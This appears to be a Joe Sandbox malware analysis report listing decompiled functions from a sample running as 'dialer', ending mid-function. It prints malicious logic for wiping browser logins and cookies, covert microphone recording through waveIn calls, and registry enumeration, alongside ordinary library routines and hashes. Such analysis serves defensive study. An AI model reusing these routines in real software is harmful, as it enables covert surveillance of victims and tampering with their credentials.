Function 0043C2CD, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043C2CD(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c; // 0x3dad585e
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E00440C0D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E0042E9F4(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042E9F4(_t78 + 4);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042E9F4(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00446905(_t56);
						_t40 = L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00446905(_t56);
						L0043EE85(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x0043c2cd
0x0043c2d7
0x0043c2db
0x0043c2dd
0x0043c2e1
0x0043c2eb
0x0043c2fc
0x0043c301
0x0043c303
0x0043c305
0x0043c307
0x0043c309
0x0043c30d
0x0043c3c7
0x0043c3d5
0x0043c3d7
0x0043c3dc
0x0043c3e3
0x0043c3f3
0x0043c402
0x0043c405
0x0043c407
0x00000000
0x0043c408
0x0043c315
0x0043c31a
0x0043c31f
0x0043c321
0x0043c321
0x0043c323
0x0043c328
0x0043c32c
0x0043c32c
0x0043c32f
0x0043c34e
0x0043c34e
0x0043c350
0x0043c353
0x0043c35c
0x0043c35f
0x0043c364
0x0043c367
0x0043c36c
0x00000000
0x00000000
0x0043c36e
0x00000000
0x0043c331
0x0043c331
0x0043c333
0x0043c33c
0x0043c33f
0x0043c344
0x0043c347
0x0043c34c
0x0043c376
0x0043c379
0x0043c37b
0x0043c37e
0x0043c386
0x0043c38c
0x0043c393
0x0043c395
0x0043c39d
0x0043c3ac
0x0043c3b0
0x0043c3b2
0x0043c3b5
0x00000000
0x00000000
0x0043c3b7
0x0043c3ba
0x0043c3bc
0x0043c3bc
0x0043c3bd
0x0043c3bf
0x0043c3c2
0x00000000
0x0043c3bc
0x00000000
0x0043c34c
0x0043c32f
0x00000000

APIs

_free.LIBCMT ref: 0043C33F
_free.LIBCMT ref: 0043C35F

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8C0, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A8C0(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				signed int _t53;
				signed int _t54;
				void* _t55;

				_t52 = __edi;
				_t54 = _t53 & 0xfffffff8;
				 *0x46bafd = 1;
				Sleep( *0x46baf8);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t59 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A7A6(_t59);
						}
						_t60 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A5CA(_t52, _t60);
						}
						_t61 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A3AF(_t36, _t52, _t61);
						}
						_t62 = _v7;
						if(_v7 == 0) {
							_v7 = E0040A320(_t52, _t62);
						}
						_t50 = _v5;
						_t63 = _t50;
						if(_t50 == 0) {
							_t50 = E0040A291(_t52, _t63);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t73 = _t40;
				} while (_t40 == 0);
				_t55 = _t54 - 0x18;
				E00402064(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
				E0040AA8C(_t36, _t50, _t73);
				E00402064(_t36, _t55, "Cleared browsers logins and cookies.");
				_t56 = _t55 - 0x18;
				E00402064(_t36, _t55 - 0x18, "[Info]");
				E004165D8(_t36, _t52);
				E00402064(_t36, _t56 + 0x18, 0x45f6ac);
				_push(0xaf);
				E00404A6E(_t36, 0x46c768, _t50, _t73);
				if( *0x46bafc != 0) {
					E004105A0(0x46c518, L00401F75(0x46c518), "FR", 1);
				}
				 *0x46bafd = 0;
				return 0;
			}

APIs

Sleep.KERNEL32 ref: 0040A8D5
Sleep.KERNEL32(00001388), ref: 0040A95D

Strings

Cleared browsers logins and cookies., xrefs: 0040A9A9
[Cleared browsers logins and cookies.], xrefs: 0040A998
[Info], xrefs: 0040A9B8

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
API String ID: 3472027048-899236412
Opcode ID: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
Instruction ID: 19d006f3e93ca70ec29b0e88cbd9a77eefac28184490fc762d726c12d351d6c4
Opcode Fuzzy Hash: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
Instruction Fuzzy Hash: 7B3190013483816ECA1577B6142A7AB7F824A93748F09847FF9C4373D3DABA4859936F

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD, Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401BAD(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t33;
				void* _t34;

				_t34 = __eflags;
				CreateDirectoryW(L00401ECB(0x46c0e0), 0);
				_t3 = 8;
				 *0x46baa6 = _t3;
				 *0x46ba9c = 0x1f40;
				 *0x46baa0 = 0x1f40;
				0x46ba98->wFormatTag = 1;
				 *0x46ba9a = 1;
				 *0x46baa4 = 1;
				 *0x46baa8 = 0;
				_t7 = E00436079(_t5, L00401F75(L00401E29(0x46c578, 1, _t34, 0x24)));
				_t24 =  *0x46ba9c; // 0x0
				 *_t33 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x46baac = _t25;
				 *0x46bab4 = (( *0x46baa6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x46bab0, 0xffffffff, 0x46ba98, E00401CCF, 0, ??);
				L00401F64( *0x46bab4);
				0x46ba78->lpData = L00401F75(0x46c0f8);
				_t15 =  *0x46bab4; // 0x0
				 *0x46ba7c = _t15;
				 *0x46ba80 = 0;
				 *0x46ba84 = 0;
				 *0x46ba88 = 0;
				 *0x46ba8c = 0;
				waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
				waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
				waveInStart( *0x46bab0);
				return 0;
			}

0x00401bad
0x00401bbd
0x00401bc5
0x00401bcb
0x00401bd3
0x00401bda
0x00401be2
0x00401bf0
0x00401bf7
0x00401bfe
0x00401c11
0x00401c16
0x00401c1f
0x00401c31
0x00401c48
0x00401c4e
0x00401c53
0x00401c66
0x00401c79
0x00401c7e
0x00401c8a
0x00401c8f
0x00401c95
0x00401c9b
0x00401ca1
0x00401ca7
0x00401cb6
0x00401cc2
0x00401ccc

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BBD
waveInOpen.WINMM(0046BAB0,000000FF,0046BA98,Function_00001CCF,00000000,00000000,00000024), ref: 00401C53
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 00401CA7
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 00401CB6
waveInStart.WINMM ref: 00401CC2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID:
API String ID: 1356121797-0
Opcode ID: 966a1548e31aa9a606f7da9fc21e7603147b816c6f31ca0f35f1168485c21c70
Instruction ID: c5b0dca06ec05a77c6bb51fb4c9fedfd770f756c2b994c02ff718fff31942188
Opcode Fuzzy Hash: 966a1548e31aa9a606f7da9fc21e7603147b816c6f31ca0f35f1168485c21c70
Instruction Fuzzy Hash: E3216031614201ABC714AFFAFC4591A7BA5EB84355700403FF505D7AB0FBB88480DB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0041729F, Relevance: 7.6, APIs: 5, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

APIs

CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004173C9,00000000,00000000,00000000,00000004), ref: 004172FA
CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417306
WriteFile.KERNEL32(00000000,00000000,00000000,00405D1C,00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417318
CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417325

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668

Uniqueness

Uniqueness Score: -1.00%

Function 0044618A, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0044618A() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00446153(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0043E61D(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						L0043EE85(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00446193
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6

Part of subcall function 0043E61D: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
_free.LIBCMT ref: 004461EF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
Opcode Fuzzy Hash: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA

Uniqueness

Uniqueness Score: -1.00%

Function 004409F6, Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E004409F6(void* __ecx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				long _t16;

				_t11 = __ecx;
				_t16 = GetLastError();
				_t10 = 0;
				_t2 =  *0x46a1e0; // 0x6
				_t19 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t15 = E0043DFD9(_t11, 1, 0x364);
					_pop(_t13);
					if(_t15 != 0) {
						_t4 = L00440F8E(_t13, _t16, __eflags,  *0x46a1e0, _t15);
						__eflags = _t4;
						if(_t4 != 0) {
							E004407E4(_t13, _t15, 0x46b654);
							L0043EE85(_t10);
							__eflags = _t15;
							if(_t15 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t15);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						L0043EE85();
						L8:
						SetLastError(_t16);
					}
				} else {
					_t15 = L00440F38(_t11, _t16, _t19, _t2);
					if(_t15 != 0) {
						L9:
						SetLastError(_t16);
						_t10 = _t15;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

APIs

GetLastError.KERNEL32(?,?,?,00439E19,0043E660,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 004409FB
_free.LIBCMT ref: 00440A30
_free.LIBCMT ref: 00440A57
SetLastError.KERNEL32(00000000), ref: 00440A64
SetLastError.KERNEL32(00000000), ref: 00440A6D

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 794a8eb93e8a69f601620b6d0840150c8da0db1465d759c6a5f181aec91cbe18
Instruction ID: 1381cb6b9671630b60042f8ed21df7efebf9c3361f552f6813510b12c123861f
Opcode Fuzzy Hash: 794a8eb93e8a69f601620b6d0840150c8da0db1465d759c6a5f181aec91cbe18
Instruction Fuzzy Hash: 4D014936141B0077F211A7726C8592B1628ABE17B6B24003BF606B22C2EE7CCD27812F

Uniqueness

Uniqueness Score: -1.00%

Function 004477EC, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004477EC(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x46a188; // 0x46a180
					if(_t23 != 0) {
						L0043EE85(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46a18c; // 0x46b64c
					if(_t24 != 0) {
						L0043EE85(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46a190; // 0x46b64c
					if(_t25 != 0) {
						L0043EE85(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46a1b8; // 0x46a184
					if(_t26 != 0) {
						L0043EE85(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x46a1bc; // 0x46b650
					if(_t27 != 0) {
						return L0043EE85(_t6);
					}
				}
				return _t6;
			}

APIs

_free.LIBCMT ref: 00447804

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD

_free.LIBCMT ref: 00447816
_free.LIBCMT ref: 00447828
_free.LIBCMT ref: 0044783A
_free.LIBCMT ref: 0044784C

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
Instruction ID: 4303ca86cc9478dbe0e1a161fb054b60f5dbdf3f65db9d6ac859b8e84f87df60
Opcode Fuzzy Hash: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
Instruction Fuzzy Hash: 21F0683240950067D620FB56E8C6C4773E9AB85B11B64182FF014E7641DF78FC86CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C51C, Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0043C51C(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0x46a9a0; // 0x2fa68e0
					if(_t7 != 0x46a780) {
						L0043EE85(_t7);
						 *0x46a9a0 = 0x46a780;
					}
				}
				L0043EE85( *0x46ba08);
				 *0x46ba08 = 0;
				L0043EE85( *0x46ba0c);
				 *0x46ba0c = 0;
				L0043EE85( *0x46ba34);
				 *0x46ba34 = 0;
				L0043EE85( *0x46ba38);
				 *0x46ba38 = 0;
				return 1;
			}

0x0043c525
0x0043c529
0x0043c52b
0x0043c537
0x0043c53a
0x0043c540
0x0043c540
0x0043c537
0x0043c54c
0x0043c559
0x0043c55f
0x0043c56a
0x0043c570
0x0043c57b
0x0043c581
0x0043c589
0x0043c592

APIs

_free.LIBCMT ref: 0043C53A

Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD

_free.LIBCMT ref: 0043C54C
_free.LIBCMT ref: 0043C55F
_free.LIBCMT ref: 0043C570
_free.LIBCMT ref: 0043C581

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
Instruction ID: db1f80643b0f74365b7cf98d951e7b1d55b60743bdd7e37d059670ddde76a049
Opcode Fuzzy Hash: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
Instruction Fuzzy Hash: 90F0F471803A209BCB116F96BC824063760E748B24B11152BF410E67B1FFB94596CFDF

Uniqueness

Uniqueness Score: -1.00%

Function 0041077E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0041077E(void* __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				char _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t110;
				void* _t141;
				int _t145;
				int _t147;
				void* _t148;
				void* _t149;

				_t112 = __ecx;
				E004505A0();
				_push(_t141);
				_t145 = 0;
				_t110 = __ecx;
				E00431810(_t141,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							E004032F1(E004043E5(_t110,  &_v108,  &_v668, _t152, E0040425F(_t110,  &_v56, "\n")));
							L00401ED0();
							_t112 =  &_v56;
							L00401ED0();
						}
						_t145 = _t145 + 1;
					} while (_t145 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t147 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E0043A6FF(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E004032F1(E004043E5(_t110,  &_v56,  &_v43956, _t156, E0040425F(_t110,  &_v132, "\n")));
								L00401ED0();
								L00401ED0();
								E00403416(E004075C4(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402064(_t110,  &_v56, "\n")));
								L00401FA7();
								L00401FA7();
								_t93 = E00402064(_t110,  &_v156, "[regsplt]");
								E00403416(L00402EFD( &_v132, E0040208B(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
								L00401FA7();
								L00401FA7();
								_t112 =  &_v156;
								_t73 = L00401FA7();
							}
							_t147 = _t147 + 1;
						} while (_t147 < _v20);
					}
				}
				return _t73;
			}

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004107E5
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00410814
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 004108B4

Strings

[regsplt], xrefs: 00410940

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
Instruction ID: 22bbaa2dbcebefa3ea57dad675ad9f0084f54ab00d474abf25edfd55553df339
Opcode Fuzzy Hash: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
Instruction Fuzzy Hash: CB511B71900219AADB10EA95CC85EEFB77DAF04304F50017AF505F2191EB786B49CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00445519, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00445519(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t137;
				void* _t139;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int* _t148;
				signed int _t151;
				void* _t154;
				CHAR* _t155;
				char _t158;
				char _t160;
				intOrPtr* _t163;
				void* _t164;
				intOrPtr* _t165;
				signed int _t167;
				void* _t169;
				intOrPtr* _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t184;
				void* _t193;
